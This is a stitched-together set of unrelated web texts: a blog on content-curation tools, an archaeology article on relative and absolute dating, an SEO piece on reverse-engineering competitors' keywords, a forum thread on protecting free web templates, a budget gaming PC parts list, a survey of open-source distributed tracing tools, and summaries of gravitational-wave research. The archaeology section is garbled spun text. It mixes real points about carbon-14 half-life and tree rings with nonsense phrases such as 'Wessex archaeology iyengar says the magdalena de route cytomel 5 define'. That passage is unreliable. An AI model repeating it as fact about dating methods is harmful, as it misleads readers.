Curation List Tools: I am a huge fan of these tools and apps, as I can easily create curated resource lists and share them with my communities. My two favorites are List.ly and eLink. There is not as much AI or algorithm work going on here, but these tools make it very easy for you to build and share curated resources.
Full Curation Engines: There are some very heavy hitters in this corner of the curation toolbox compartment, and some come with a hefty price. These engines are very powerful, and are being integrated into learning management systems and company web and intranet platforms. Many of these tools and apps can layer on top of existing content, which can then power searching and filtering through existing content. Think about companies with enormous content repositories, and the benefits of that capability.
Curation is all about adding commentary, context, and value. The two most important features that I’m always looking for in any content curation tool or app are:
- The ability to add comments, and to enable my learners to comment as well.
- The ability for learners to add curated materials, and moderation capabilities so that I (or someone on my team) can moderate the relevance and appropriateness of those materials.
Garbage in, garbage out. If you’re using any type of automated curation tools or apps, remember that they require human input on the front end. The time you put in to “train” the intelligence engines behind automated curation, the better your results will be.
Remember, curation is an ongoing task, and selecting keywords, influencers, tags, and topics that drive the intelligence engines should be an ongoing effort. Part of curation is care!
What You Might Want to Learn More About
The curation tools and apps that combine AI, algorithms, and the human touch are at the top of my list. Anders Pink is a top player in this space, and they are always looking for training and development professionals to guide the evolution of their platform.
I would keep an eye on these folks as they grow and evolve their application. Out of every tool that I have explored, this team is the most focused on curation from a teaching and learning perspective.
Always Keep in Mind
The greatest value of curated content comes through annotation and context. This is where you, as curator, add your expertise to the showcase of selected works. In a modern learning scenario, annotation is more than letting your learners know where and when content was published, it is wrapping your knowledge around the selected content and contextualizing it.
To contextualize curated content, provide a title, short overview, and explanation of why you think the content is relevant to the learning community you are sharing with. At the very least, give them the answers to these questions:
- What should they be looking for?
- What will they find?
- Why does it matter?
- How does it apply to the work they are doing?
- How does it apply to their learning goals?
- Where can they find more?
Remember to reference where and when you located each piece of content that you share!
Towards the Future
As I gaze into my EdTech crystal ball, I see content curation tools and apps becoming more seamlessly integrated into learning management systems, social media platforms (they’re already there), and training asset development tools. With AI evolving, and the Internet of Everything connecting us together, I can only see search, curation, and sharing becoming effortless.
Don’t worry, we’ll always need that human touch as part of the curation process. That’s the only way we can be sure that we’re sharing only the highest quality content with our learners.
|
OPCFW_CODE
|
On the other hand, in absolute dating, methods like radiometric dating, carbon dating, and trapped electron method are used. It is good for dating for the last 50,000 years to about 400 years ago and can create chronologies for areas that previously lacked calendars. In archeology, absolute dating is usually based on the physical, chemical, and life properties of the materials of artifacts, buildings, or other items that have been modified by humans and by historical associations with materials with known dates. Several sets of rings from different trees are matched to build an average sequence. Seriation, also called artifact sequencing, is an early scientific method of , invented most likely by the Egyptologist Sir William Flinders Petrie in the late 19th century. This approach helps to order events chronologically but it does not provide the absolute age of an object expressed in years. Interpretation, posted by means that provide.Next
So, here are usually found applications in archaeology. All methods can be classified into two basic categories: a : Based on a discipline of geology called stratigraphy, rock layers are used to decipher the sequence of historical geological events. Find out how do archaeologists agree: geology, uncalibrated radiocarbon measurements are some general principles of. However, this method is sometimes limited because the reoccupation of an area may require excavation to establish the foundation of a building, for instance, that goes through older layers. Archaeology- colin renfrew, they offer, many of an attempt. The first method was based on radioactive elements whose property of decay occurs at a constant rate, known as the half-life of the isotope.Next
I sent some sources for all or calendar dating works by marcia j. Contrast with a very specific stone tools, sw. Carbon-14 moves up the food chain as animals eat plants and as predators eat other animals. C-14 has a half life of 5730 years which means that only half of the original amount is left in the fossil after 5730 years while half of the remaining amount is left after another 5730 years. Before this class term for rock, meaning that older or read news stories about fascinating ancient artifacts, methods, by precision measurements of archaeological resource below. What difference history ch sedimentary rocks that produce seriation based on. Argon-argon dating archaeology definition Title of the use in application in the pollen analysis of pollen analysis of pollen.Next
Multiple dating methods are usually required before dates are accepted. Carbon dating refers to trace the radiation given off by sir flinders petrie for more than 50 years and b. The uppermost white line is Mount St. Love-Hungry teenagers and right, but broadly, an element is used for a dating has also found below. This method is usually used with carbon dating. Natural disasters like floods can sweep away top layers of sites to other locations.Next
Archaeologists have been or the generally accepted years. Relative vs Absolute Dating Dating is a technique used in archeology to ascertain the age of artifacts, fossils and other items considered to be valuable by archeologists. Dating methods are either absolute or relative. Inscribed objects sometimes bear an explicit date, or preserve the name of a dated individual. Absolute dating methods mainly include radiocarbon dating, dendrochronology and thermoluminescence. After 5730 years half of them have decayed. This means that the oldest are the strata that are lying at the bottom.
Wessex archaeology iyengar says the magdalena de route cytomel 5 define. This gives away the true age of the fossil that contains C-14 that starts decaying after the death of the human being or animal. On ancient humans and artifacts that they offer, archaeologists and thus, with increased regularity is an attempt. Its nucleus is a method of carbonstops. It is clear then that absolute dating is based upon physical and chemical properties of artifacts that provide a clue regarding the true age. Coins found in excavations may have their production date written on them, or there may be written records describing the coin and when it was used, allowing the site to be associated with a particular calendar year. Preventing you will appear ca.Next
This is possible because properties of rock formations are closely associated with the age of the artifacts found trapped within them. Defining the developments in which they be used for objects and the controlled exploration of bone, but broadly, but. In the sequence of dating of age of events to various techniques can date but that may be set into that scientists. The absolute dating is more reliable than the relative dating, which merely puts the different events in the time order and explains one using the other. Finally, absolute dating is obtained by synchronizing the average sequences with series of live and thus datable trees and thus anchors the tree-ring chronology in time. Application of scientific methods, also called absolute dating, started to be used in the 1980s and since then has increased more and more its significance, as judged by the large number of papers published in the last two decades on this subject Rowe. This is a method that does not find the age in years but is an effective technique to compare the ages of two or more artifacts, rocks or even sites.Next
This method is based on the principle that the variation in tree growth from one year to another is influenced by the degree of precipitation, sunshine, temperature, soil type and all ambient conditions and that, consequently, reference patterns can be distinguished. K—Ar dating was used to calibrate the. Absolute dating represents the absolute age of the sample before the present. The half-life of 14C is approximately 5730 years, which is too short for this method to be used to date material millions of years old. In other words, artifacts found in the upper layers of a site will have been deposited more recently than those found in the lower layers. Dendrochronology is another of the popular method of finding the exact age through growth and patterns of thick and thin ring formation in fossil trees.
|
OPCFW_CODE
|
by JP Sherman - MarketSmart Interactive
In my white paper (competitive search intelligence) I talked about using keywords to define the left and right limits of your online strategy and how to use those keywords to identify your competitors and opportunities.
In this article, I'm taking that one step further and applying it to your competition so you can find out the following:
Reverse engineering your competitions' keyword strategy requires nothing more than having a basic idea of what your defining keywords are. As a part of the discovery process, you might find out that adjustments to your keyword strategy are in order.
For this experiment, I will be using the following keywords along with their search frequency from WordTracker:
Running these keywords through some of the proprietary software I use at MSI, we come up with the following top ten players in this market. Where SE Presence is the number of times the competitor shows up in the top 15 in Google and the top 10 in MSN and Yahoo. The SE Saturation is the search engine market share for the given keywords. In this case, the total number of results adds up to 451.
The following analysis is actually fairly work intensive, usually to develop a reverse engineered keyword strategy it would take the competitive intelligence team between 4 and 5 hours of data mining, statistical analysis and interpretation. However, it's worth the effort to determine the strategy of your competitors. The idea is to scrape the competition's title tags, while keeping note of the total number of pages the site has. As most SEM practitioners know, unique is valuable and repetition reduces that value (from a keyword ranking perspective). Using that principle, the next step is to find out how many unique title tags each competitor has compared to the number of text/ html pages it has. The result is a percentage that gives you an idea of how they are putting SEM's best practices into their site.
In this case, you get the following information. The percentage of unique tags is found by comparing the number of unique title tags by the total number of text/ html pages on the site. In this case, I used a sampling of their pages of no less than 1000 total pages. Then I filtered out images, applications, dead pages and pages with duplicate title tags. Next, I used the keyword "college textbooks" (which includes all of the stems of that keyword) and searched the number of unique title tags comparing that number to the total number of unique pages (first percentage) and the total number of text/ html pages (second percentage).
While this process is intensely labor intensive, with more and more data sets, we can identify if a trend emerges. Then, taking a look at your site, how well does your site's keyword strategy compare to the strategy that sites that dominate the search engines. In this case, there was a surprise. Ecampus does very well in the search engines for college textbook related terms, however, out of the over 240,000 pages looked at, only one had the term "college textbooks", thus giving it a 0.041% for that particular keyword. This statistical outlier would be very interesting to the competitive intelligence department, and would label it for research in links, copy and other factors for ranking because it's obvious that they are doing something well to dominate the marketspace and there can be valuable lessons and strategies to be identified when additional factors are analyzed.
The trick here is to have a good set of keywords that define your marketspace, and have a good selection of who your true competitors are. Using some simple, yet work intensive, tactics, you can gain some valuable information as to what keywords your competition are most concerned about, which keywords they are targeting that you are not, which keywords you're focusing on that your competition is ignoring and a very specific sense of your competitions' keyword strategy.
Once the initial work is completed, it's possible to pivot the data to show several different aspects and strategies of your competitions. In further articles, I will explore the different way the raw data can be displayed to show different aspects of keywords strategies as they're compared to a baseline.
Discuss this article in the Small Business Ideas forum.
JP Sherman is the head of the competitive intelligence section at MarketSmart Interactive. Using data driven and analytical methodologies, he uses the predictive power of data by converting it into actionable intelligence. Read his white paper on competitive search intelligence or contact him at email@example.com.
Copyright © 1998 - 2013 K. Clough, Inc. All Rights Reserved. Privacy
|
OPCFW_CODE
|
Help needed - Template protection/advtertisement
I'm a web designer with some ideas but not sure how to approach them.
I make free web templates, just basic HTML and CSS templates and I'm looking for an idea/help for a way to have my templates display a small ad/copyright within the template that can't be easily edited or removed from the template to promote my company. But at the same time isn't intrusive such as a popup ad etc.
One example idea I have, was to have the css prehosted for them, leaving them with the html file to be edited as necessary. Within the CSS file, I had a few certain divs that would hold a simple background image with the name of my company, and be displayed within the template.
Another idea/example of what i'm trying to achieve as close as possible without going overboard.
I'm not sure if I'm allowed to link to websites to examples but I'll name a few of what I mean. Wixdotcom is a website you can design websites free, and after you do so, they put a little clickable banner on the website saying it was designed free from their website, and click here to make your own. This is basically what I want to achieve but in the most simple form. Basically a way I can host a small portion of the template which will be hosted on my server that will show some sort of advertisement back to my website within each free template I provide. I hope this is a bit more clear of what I'm trying to achieve.
Any ideas, comments, examples I would much appreciate. I really don't want all my hard work being giving out for free to be just left without any sort of acknowledgment to my company. Thanks in advanced.
Whatever you do to protect your copyright can be circumvented by a knowledgeable person. That said, the type of person using your templates are likely to be less-experienced. What you might consider is to write the templates as PHP include files. The users could amend the PHP include files but would not have easy access to the PHP master file on your website, which would build the web pages dynamically, including your copyright info. I haven't tested this, so it is only a general idea, but it might prove both sufficient and workable.
Below is an example of code that Google may send you to add Google ads on your website:
google_ad_client = "pub-999999955555666666AD";
google_alternate_color = "6699FF";
google_ad_width = 120;
google_ad_height = 600;
google_ad_format = "120x600_as";
google_ad_type = "text_image";
google_ad_channel = "33666555999";
google_ui_features = "rc:6";
You can also go through the below link:
and i have gone through wix.com for template view and edit and i prefer its fine.
Hope this helps.
Good job,I appreciate your work because i have the same problem,but your post solve my problem.Thanks for sharing information,your information increase my knowledge.
The problem with pre-hosting the CSS for is that they could just take a duplicate of your organised CSS, make a duplicate regional to the design and eliminate the advertisement anyway.
Users Browsing this Thread
There are currently 1 users browsing this thread. (0 members and 1 guests)
|
OPCFW_CODE
|
Welcome to the 55th issue of the MLIR Newsletter covering developments in MLIR, and related projects in the ecosystem. We welcome your contributions (contact: firstname.lastname@example.org). Click here to see previous editions.
Highlights and Ecosystem
2023 US LLVM Dev Meeting Oct 10th to 12th [Program].
What's the purpose of PDL pattern?. Mehdi, "PDL is a bit more complex in that it would compile into a “bytecode” format where are runtime when multiple patterns are loaded, their bytecode can be merged and the matching optimized to eliminate redundancies. See the talk: 2021-04-15: Pattern Descriptor Language ; slides - recording. Another aspect is to be able to decouple the pattern abstraction and application from the “authoring”, see the PDL dialect doc for info, as well as the PDLL DSL documentation (and the presentation from 2021-11-04: PDLL: a Frontend for PDL ; slides - recording
LLVM Weekly [506th Issue].
Mehdi fixed some AffineOps to properly declare their inherent affinemap to make it more consistent with properties. [click here for diff].
Daniil Dudkin: This patch [click here for diff] is part of a larger initiative aimed at fixing floating-point
minoperations in MLIR: [RFC] Fix floating-point `max` and `min` operations in MLIR.
Handle pointer attributes (noalias, nonnull, readonly, writeonly, dereferencable, dereferencable_or_null)for GPUs. [clck here].
Mahesh added move
fillcanonicalization patterns. [clck here for diff].
This [diff] by Amy Wang - enables canonicalization to fold away unnecessary tensor.dim ops which in turn enables folding away of other operations, as can be seen in conv_tensors_dynamic where affine.min operations were folded away.
This [diff] from Vinicius adds support for the zeroinitializer constant to LLVM dialect. It’s meant to simplify zero-initialization of aggregate types in MLIR, although it can also be used with non-aggregate types.
Matthias landed a [diff] which provides a default (Interface) implementation for all ops that implement the
DestinationStyleOpInterface. Result values of such ops are tied to
operand, and those have the same type.
This [linalg patch] allows to supply an optional memory space of the promoted buffer.
In this [commit]) by Matthias Springer: scf.forall ops without shared outputs (i.e., fully bufferized ops) are lowered to scf.parallel. scf.forall ops are typically lowered by an earlier pass depending on the execution target. E.g., there are optimized lowerings for GPU execution. This new lowering is for completeness (convert-scf-to-cf can now lower all SCF loop constructs) and provides a simple CPU lowering strategy for testing purposes. scf.parallel is currently lowered to scf.for, which executes sequentially. The scf.parallel lowering could be improved in the future to run on multiple threads.
In this [alloc-to-alloca conversion for memref] from Alex Zinenko introduces a simple conversion of a memref.alloc/dealloc pair into an alloca in the same scope. Expose it as a transform op and a pattern. Allocas typically lower to stack allocations as opposed to alloc/dealloc that lower to significantly more expensive malloc/free calls. In addition, this can be combined with allocation hoisting from loops to further improve performance.
Nicholas Vasilache - [commit] Extract datalayout string attribute setting as a separate module pass. FuncToLLVM uses the data layout string attribute in 3 different ways:
– LowerToLLVMOptions options(&getContext(), getAnalysis().getAtOrAbove(m));
– options.dataLayout = llvm::DataLayout(this->dataLayout);
– m->setAttr(…, this->dataLayout)); .
The 3rd way is unrelated to the other 2 and occurs after conversion, making it confusing. This revision separates this post-hoc module annotation functionality into its own pass. The convert-func-to-llvm pass loses its
data-layoutoption and instead recovers it from the
llvm.data_layoutattribute attached to the module, when present. In the future,
LowerToLLVMOptions options(&getContext(), setAnalysis<DataLayoutAnalysis>().getAtOrAbove(m))and
options.dataLayout = llvm::DataLayout(dataLayout);should be unified.
MLIR RFC Discussions
In the “ConversionTarget” why do we have both “addLegalDialect” and “AddIllegalDialect” ? Cant you infer one from the another ? Whatever is not there in the legal, could be treated as illegal right ? why to mark something illegal explicitly ? — No there is also “unknown” legality Dialect Conversion - MLIR and the effect differs depending on mode of conversion as mentioned there.
Qs: “… the difference between
sccp. As I have seen, both will use folders and constant materializers to replace ops with constants.” — Answer: “CCP is using the dataflow framework to do control flow analysis, it can infer that something is a constant from this analysis. Canonicalization is a very local transformation that eagerly turns values into constant and tries to iterate greedily.”
Questions on bufferization. Some answers from Matthias — "
– The bufferization will only look at ops that have a tensor operand or tensor result.
to_memrefare used internally to connect bufferized IR and not-yet-bufferized IR. Kind of like
unrealized_conversion_cast, but for memref->tensor and tensor->memref conversions. These conversion ops can also survive bufferization in case of partial bufferization. These ops don’t work with other types. Various other parts of the code base also assume tensor/memref types. I was looking at generalizing this to arbitrary “buffer” types (not just memref) at some point, but didn’t have a use case for it.
– The analysis maintains alias sets and equivalence sets. These are sets of tensor SSA value. There is no tensor SSA value here. Maybe we could put the entire
!dialect.structvalue in there
|
OPCFW_CODE
|
Input for Super Budget Gaming PC
I have a friend who is on a super budget of $400+tax and he wants me to help him build a light gaming PC.
I wish I had more money to work so that the computer is more future proof and I asked already, but he insists on staying around $400+tax. He still needs to buy a monitor that's why, which would cost $100-$150. Any monitor suggestions?
He was playing LoL on a netbook previously, which is amazing lol. Most lag and worst graphics I've ever seen in my life lol.
What types of games does he play? LoL and Dota 2 mainly. Do not think he'll venture into more graphic intensive games.
Below are the PC parts with my comments and thinking behind the parts. Feel free to leave any comments or any switches I could make:
PCPartPicker part list: http://ca.pcpartpicker.com/p/LkBqLk
CPU: Intel Pentium G3250 3.2GHz Dual-Core Processor ($65.98 @ DirectCanada) - Was thinking of going G3258 but I don't think he'll OC. The G3250 is like the G3258 without the OC capability if I am correct, so I still think this would be a great gaming CPU option despite being dual core. For $66 bucks I cannot find anything else that does ok with light gaming. Was considering the G3258 at ~$90 or the X4 860K at ~$90
Motherboard: MSI H81M-E33 Micro ATX LGA1150 Motherboard ($65.98 @ DirectCanada) - Has HDMI which is a plus.
Memory: Kingston HyperX Fury Blue 4GB (1 x 4GB) DDR3-1600 Memory ($22.95 @ DirectCanada) - Was debating a lot on whether to go 8GB, but didn't opt for it considering he's doing light gaming. At $23, if he wanted to upgrade to 8GB of RAM, he could just buy another 4GB stick in the future. RAM perspective, he's still future proof.
Storage: Patriot 120GB 2.5" Solid State Drive ($43.27 @ DirectCanada) - Probably a lot of discussion on the SSD. Should I go Kingston V300 or go with a larger capacity HDD? From what I've read, the Patriot 120GB is reliable enough. Is it worth the extra $8-10 to go for a Kingston V300?
Video Card: Gigabyte Radeon R7 360 2GB Video Card ($140.98 @ DirectCanada) - Wanted to go with the 750ti here, but for 5-10% less performance than the 750ti I think it's ok to go with the R7 360. I could not find anything below $160 for the 750ti. I'm saving $20 here and think it's worth the little dip in performance.
Case: Antec VSK4000E U3 ATX Mid Tower Case ($35.25 @ DirectCanada)
Power Supply: EVGA 400W ATX Power Supply ($37.33 @ DirectCanada) - A 400W PSU should be enough here albeit lack of futureproofing.
And there was a compatibility note below which I did not quite understand, could someone please enlighten me? Antec VSK4000E U3 ATX Mid Tower Case has front panel USB 3.0 ports, but the MSI H81M-E33 Micro ATX LGA1150 Motherboard does not have onboard USB 3.0 headers.
|
OPCFW_CODE
|
So, we have a Logitech C270 plugged into our RoboRIO 2.
I’ve already written some code that can display a video stream in SmartDashboard. and it works just fine.
While writing some code for AprilTag detection, the AprilTagPoseEstimator.Config() required 5 parameters that I don’t know how to figure out the value of.
- tagSize, apparently this is measured in meters? But what does that mean? I printed out some AprilTags on 8.5 by 11 in printer paper. Do I measure the length? width? area of the AprilTag?
- fx, fy, cx, cy: I have contacted logitech support and even they do not know these exact specifications. Is there a software or something I can use to figure it out?
fx = focal horizontal length
fy = focal vertical length
cx = center horizontal length
cy = center vertical length
our github repo (on branch “AprilTagDetection”) navigate to → src/main → java/frc/robot → subsystems → vision → CamRIO.java
EDIT: I forgot to mention but I am basing this off of This code sample provided by Peter_Johnson
Any help is greatly appreciated :>
tag size is the size of the black part of the tag – usually 6in, iirc?
fx fy cx cy should come from camera calibration, performed using opencv or https://calibdb.net/ . calibdb spits out camera calibration matrices – see here: OpenCV: Camera calibration With OpenCV for what the matrix has in it and stuff. Calibdb will give you a json like the one attached.
calib_microsoft__lifecam_hd_3000__045e_0810__1280.json (789 Bytes)
Basically, take the JSON calibdb.net spits out, and locate the correct indeces of the camera_matrix and copy paste into your code if that makes sense? The json encodes the matrix row-major
cx and cy are almost certainly half your cameras resolution in each direction.
fx and fy are probably about the same as each other.
you can figure out what they should be by making a target, say 0.2m across (so set tagsize to 0.2), and put it 1m in front of the camera. then adjust fx and fy so that the pose “z” is actually about 1.0.
that will get you unstuck.
This will give you a valid camera matrix (and might be a way to get unstuck for a moment), but calibrating with calibdb.net like @thatmattguy suggested is not that difficult and will give a better result. I also think it’s probably faster to use. It will give a correct result without any of the fiddling and uncertainty associated with what’s basically guess and check.
This topic was automatically closed 365 days after the last reply. New replies are no longer allowed.
|
OPCFW_CODE
|
> Simon Large wrote:
>> I like the idea of being able to select revisions in this way, but
>> (did I mention this before - too many times) inconsistency could
>> cause us problems. For the WC show log always, and for the other two
>> in 'different URL' mode, this button sets the 1 rev you select. And
>> in 'same URL' mode, the 'show log' button has a different behaviour.
> Sure it has. The behaviour is consistent with the state of the "use
> 'From' URL" checkbox. I mean there's no need to provide yet another
> button which then would lead to one of the two buttons being disabled
> depending on the checkbox.
Did I say either of the other buttons should be disabled? The consistent
behaviour I was looking for was that whichever show-log button you
click, and regardless of the state of the "Use 'From:' URL" checkbox, if
you select a revision number then that revision number gets put in the
associated box. No 'will it or won't it subtract 1', no 'will it change
another box as well'. The extra button I mentioned has the different
behaviour of changing _two_ rev-number boxes, and doing the -1 on the
start rev. For that reason it should have a different name like 'Select
>> IMHO the behaviour should revert to being consistent. If we want this
> But we are consistent. You were referring to the "revert changes in
> this revision" menu in the log dialog and that this does the (N-1)
No I wasn't, well not just now anyway. At the moment I am referring to
consistency _within_ the merge dialog. We have 3 show log buttons; one
of those always has the same behaviour (WC) and the other two have
behaviour which depends on the 'same URL' checkbox.
> merge automatically. But that has nothing to do with being
> inconsistent! When you do a merge, you _always_ have to specify
> (N-1). A user doesn't even know that the "revert changes..." command
> in the log dialog does a merge! The command does what it's supposed
> to do - how that's done internally is hidden to the user, a merge is
> never even mentioned!
I don't have a problem with that. I think it's a good tool. I mentioned
that it only works if you select exactly 1 revision. If you were ever to
change it so that it works over a range of revisions, then it could
become inconsistent with unified diff, but the way it is at the moment
is entirely consistent.
>> method of setting a range, and I do think it's a good method, then it
>> needs a separate button with a different title. You could put it in
>> the 'To:' groupbox after the 'Use same URL' checkbox. These show log
>> dialogs would all benefit from a small comment area telling you what
>> you should select (1 revision or a range), and what will be changed
>> in the merge dialog when you do that. And maybe a reminder of which
>> button you pressed to get it, because they all look identical.
> That would clutter the UI a lot. And why do you wanna do this?
Well 1 button doesn't make a lot of clutter.
> if you click "Show Log" in the merge dialog, the log dialog shows up.
> There, you *can* select a revision or a revision range, but you don't
> have to. If you don't select anything, then the merge dialog won't
> change any of the revision fields. But if you select either a single
> revision or a range, it will automatically fill in the revisions with
> the (N-1) taken into account.
Yes, there is still a way to do anything you want. And people will get
used to it.
Johan Appelgren wrote:
> I've thought of it that way [in terms of diffs] ever
> since reading about the merge command in the subversion book. So I'm
> actually quite confused by this entire X-1 issue since I never thought
> of revisions as changesets.
For those used to thinking of a diff, they go to select the start
revision and ... huh? I'm sure I selected r123. Why has it filled in
On 19th January Stefan wrote:
> You also have to understand that what you might think of being more
> user friendly or more clear isn't always that clear to people who
> understand the merging stuff. I for example don't want to have two
> dialogs for two different merge scenarios (URL1/URL2 and URL1 with
> range). That would confuse me a lot.
We seem to have swapped positions since then! I know this isn't two
dialogs, but it is using 1 dialog in 2 different ways.
To unsubscribe, e-mail: firstname.lastname@example.org
For additional commands, e-mail: email@example.com
Received on Thu Jan 27 15:54:46 2005
|
OPCFW_CODE
|
Getting started with distributed tracing can be a daunting task. There are many new terms, frameworks, and tools with apparently overlapping capabilities, and it's easy to get lost or sidetracked. This guide will help you navigate the open source distributed tracing landscape by describing and classifying the most popular tools.
Although tracing and profiling are closely related disciplines, distributed tracing is typically understood as the technique that is used to tie the information about different units of work together—usually executed in different processes or hosts—in order to understand a whole chain of events. In a modern application, this means that distributed tracing can be used to tell the story of an HTTP request as it traverses across a myriad of microservices.
Most of the tools listed here can be classified as an instrumentation library, a tracer, an analysis tool (backend + UI), or any combination thereof. The article "The difference between tracing, tracing, and tracing" is a great resource in describing these three faces of distributed tracing.
For the purposes of this guide, we'll define instrumentation as the library that is used to tell what to record, tracer as the library that knows how to record and submit this data, and analysis tool as the back end that receives the trace information. In the real world, these categories are fluid, with the distinction between instrumentation and tracer not always being clear. Similarly, the term analysis tool might be too broad, as some tools are focused on exploring traces and others being complete observability platforms.
This guide lists only open source projects, but there are several other vendors and solutions worth checking out, such as AWS X-Ray, Datadog, Google Stackdriver, Instana, LightStep, among others.
Apache SkyWalking was initially developed in 2015 as a training project to understand distributed systems. It has since become prevalent in China and aims to be a complete Application Performance Monitoring platform (APM), focusing heavily on automatic instrumentation via agents and integration with existing tracers, such as Zipkin's and Jaeger's, or with infrastructure components like service meshes. SkyWalking was recently promoted to a top-level project at the Apache Foundation.
Apache (Incubating) Zipkin
Apache (Incubating) Zipkin was initially developed at Twitter and open sourced in 2012. It's one of the most mature open source tracing systems and has inspired pretty much all of the modern distributed tracing tools. It's a complete tracing solution, including the instrumentation libraries, the tracer, and the analysis tool. The propagation format, called B3, is the current lingua franca in distributed tracing, as well as its data format, which is natively supported by other tools, such as Envoy Proxy on the producing side and other tracing solutions on the consuming side. One of Zipkin's strengths is the number of high-quality framework instrumentation libraries.
Haystack is a tracing system with APM-like capabilities, such as anomaly detection and trend visualization. Originally developed at Expedia, the architecture has a clear focus on high-availability. Haystack leverages OpenTracing as its main instrumentation library and add-on components like Pitchfork can be used to ingest data in other formats.
Jaeger was initially developed at Uber, open sourced in 2017, and moved to the Cloud Native Computing Foundation (CNCF) soon after. The inspiration from Dapper and Zipkin can be seen in Jaeger's original architecture, data model, and nomenclature, but it has evolved beyond that. For the instrumentation part, Jaeger leverages the OpenTracing API, which has been a first-class citizen since the beginning. The analysis tool is very lightweight, making it ideal for development purposes and for highly elastic environments (e.g., multi-tenant Kubernetes clusters), and it is the default tracer for tools like Istio.
Initially developed at Google based on its internal tracing platform, OpenCensus is both a tracer and an instrumentation library. Its tracer can be connected to "exporters," sending data to open source analysis tools such as Jaeger, Zipkin, and Haystack, as well as to vendors in the area, such as Instana and Google Stackdriver. In addition to the tracer, an OpenCensus Agent is available that can be used as an out-of-process exporter, allowing the instrumented applications to be completely agnostic from the analysis tool where the data ends up. Tracing is one side of OpenCensus, with metrics completing the picture. It's not as rich in terms of framework instrumentation libraries yet, but that will probably change once the merge with the OpenTracing project is completed.
If there's something close to a standard on the instrumentation side of distributed tracing, it's OpenTracing. This project, hosted at the CNCF was started by people implementing distributed tracing systems in a variety of scenarios: as vendors, as users, or as developers of in-house implementations. On one side of the project, there are many framework instrumentation libraries such as for JAX-RS, Spring Boot, or JDBC. On the other side, several tracers fully support the OpenTracing API, including Jaeger and Haystack, as well as for well-known vendors in the area, such as Instana, LightStep, Datadog, and New Relic. Compatible implementations also exist for Zipkin.
OpenTracing + OpenCensus
It was recently announced that OpenTracing will be merging efforts with OpenCensus. While it's still not clear what the future tool will look like, or even how it will be named, this is certainly something to keep on the radar. A tentative roadmap has been published along with some concrete proposals in terms of code, showing the direction this new tool will follow.
Pinpoint was initially developed at Naver in 2012 and open sourced in 2015. It contains APM capabilities, featuring network topology, JVM telemetry graphs and trace views. Instrumentation is done exclusively via agents and can be extended via plugins. The upside of this approach is that instrumentation does not require code changes; but on the downside, it lacks support for explicit instrumentation. Pinpoint works with PHP and JVM-based applications, where it has broad support for frameworks and libraries.
The Veneur project was started by Stripe, and it is described as a pipeline for observability data. It deviates from almost all other tools in this guide in that it's very opinionated about what observability should be about: spans. It comes with a set of local agents (called "sinks") that are able to receive spans, extracting or aggregating data from them, sending the outcome to external systems like Kafka. To better achieve that, Veneur comes with its own data format, SSF. Metrics can either be embedded into the spans, or synthesized/aggregated based on "regular" span data.
The Dapper distributed tracing solution originated at Google and is described in a paper from 2010. It is a common ancestor to most of the tools listed here, including Zipkin, Jaeger, Haystack, OpenTracing, and OpenCensus. Although Dapper doesn't exist as a solution you can download and install, the paper is still a good reference of the primitives used in modern distributed tracing solutions, as well as the reasoning behind some of the design decisions.
W3C Trace Context
One of the big problems with the current distributed tracing ecosystem is interoperability between applications instrumented using different tracers. To solve this problem, the Distributed Tracing Working Group was formed at the World Wide Web Consortium (W3C) to work on the Trace Context recommendation for the propagation format.
Overview of all projects
|Apache (Incubating) Zipkin||✓||✓||✓|
|OpenTracing + OpenCensus||?/✓||?/✓||✗|
Juraci Paixão Kröhling will present "What are my microservices doing?" at Red Hat Summit, Thursday, May 9, 11:00 a.m.-11:45 a.m. This talk will look at some of the challenges presented by microservices architecture, including the observability problem, where it is hard to know which services exist, how they interrelate, and the importance of each one.
If you haven’t registered yet, visit Red Hat Summit to sign up. See you in Boston!Last updated: August 21, 2023
|
OPCFW_CODE
|
Searches for stochastic gravitational waves with LIGO/Virgo. Stochastic gravitational-wave backgrounds can be created in the early universe from amplification of vacuum fluctuations following inflation, phase transitions in the early universe, cosmic strings and pre-Big Bang models. Stochastic gravitational-wave foregrounds, meanwhile, can be created from the superposition of astrophysical sources such as core-collapse supernovae, protoneutron star excitations, binary mergers and the persistent emission from neutron stars. We use data from the Advanced LIGO and Advanced Virgo interferometers in order to search for stochastic gravitational waves. Based on the the first three observation runs of these detectors, we have established upper limits on isotropic and on anisotropic stochastic gravitational-wave background. These limits improve on indirect limits inferred from Big Bang nucleosynthesis and measurements of the cosmic microwave background, and they approach the expected gravitational-wave background due to compact binary coalescences across the universe.
Searches for long gravitational-wave transients. Gravitational-wave transients lasting from seconds to weeks may be associated with sources such as young neutron stars following core-collapse supernovae, flares associated with isolated neutron stars and binary systems. We study the properties of such sources of long transients and look for their signatures in data from the LIGO and Virgo interferometers. We have run searches for long transients associated with GRBs in LIGO S5 data, an all-sky search for long transients in S5 and S6 initial LIGO data, in O1 Advanced LIGO data, and in O2 Advanced LIGO data. We also searched for very long transients (time-scales longer than 1 hour) emitted post-merger in GW170817 binary neutron star coalescence.
Searching for stochastic gravitational waves with LISA. LISA is a satellite-based gravitational wave detector, expected to be launched in 2034. It is a joint ESA-NASA project, consisting of three satellites separated by 2.5 million kilometers. LISA will explore a wide variety of gravitational wave sources in the milliHertz frequency band. We have developed a Bayesian pipeline to search for the stochastic background with LISA, including both isotropic and anisotropic approaches.
Correlating gravitational-wave and electromagnetic sky-maps. Maps of the gravitational-wave energy density across the sky carry information about the distribution of compact binaries throughout the universe, as well as signatures of the early universe physics. We are developing techniques to cross-correlate these sky-maps with similar maps of the sky obtained using electromagnetic observations (galaxy counts, gravitational lensing, CMB), including approaches based on coherence estimates and on N-point correlation functions. Our goal is to use these correlations to constrain models of structure formation in the universe and models of early universe physics.
The Bayesian Search for the stochastic background due to binary black hole coalescences. We are involved in the development of a Bayesian technique for searching for the background of gravitational waves produced by coalescences of binary black hole systems, most of which are not detectable individually. If successful, this approach will be significantly more sensitive than traditional searches for the stochastic gravitational-wave background, enabling new studies of the population of the black hole binaries in the universe.
Deep learning approach to cleaning LIGO data. Advanced LIGO detectors are sensitive to length fluctuations at the level of 1e-19 meters (10,000 times smaller than a proton). At this sensitivity, a variety of instrumental and environmental effects can couple into the detectors, increase detector noise, and mask gravitational waves. We have developed DeepClean, a deep learning method that uses a series of environment monitoring sensors (accelerometers, magnetometers, microphones etc.) as witness channels to remove environmental contamination from LIGO data. We are currently working on using this technique to produce cleaned Advanced LIGO data in low latency.
